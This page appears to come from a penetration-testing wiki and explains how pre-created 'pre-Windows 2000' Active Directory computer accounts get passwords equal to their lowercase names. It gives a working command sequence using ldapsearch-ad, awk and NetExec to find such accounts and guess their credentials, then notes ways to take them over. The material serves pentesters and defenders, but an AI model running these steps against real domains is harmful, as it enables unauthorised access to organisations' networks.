search
GitHubTwitterExegolTools

Pre-Windows 2000 computers

hashtag
Theory

When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.

Once an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpostarrow-up-right, its password will usually need to be changed.

hashtag
Practice

Finding computer accounts that have been "pre-created" (i.e. manually created in ADUCarrow-up-right instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControlarrow-up-right flags):

  • 32 - PASSWD_NOTREQD

  • 4096 - WORKSTATION_TRUST_ACCOUNT

The logonCount attribute can be filtered as well.

The ldapsearch-adarrow-up-right tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExecarrow-up-right (Python) for instance.

# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce

You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.comarrow-up-right)

Testers can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.pyarrow-up-right, kpasswd.pyarrow-up-right, etc.) in order to use it.

circle-check

Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (sourcearrow-up-right)

The ticket obtained can then be used with Pass the ticket

hashtag
Resources

LogoDiving into Pre-Created Computer AccountsTrustedSecchevron-right
HOW TO: Manage Computer Accounts in Active Directory in Windows 2000web.archive.orgchevron-right
PreviousMachineAccountQuotaNextRODC

Last updated

Was this helpful?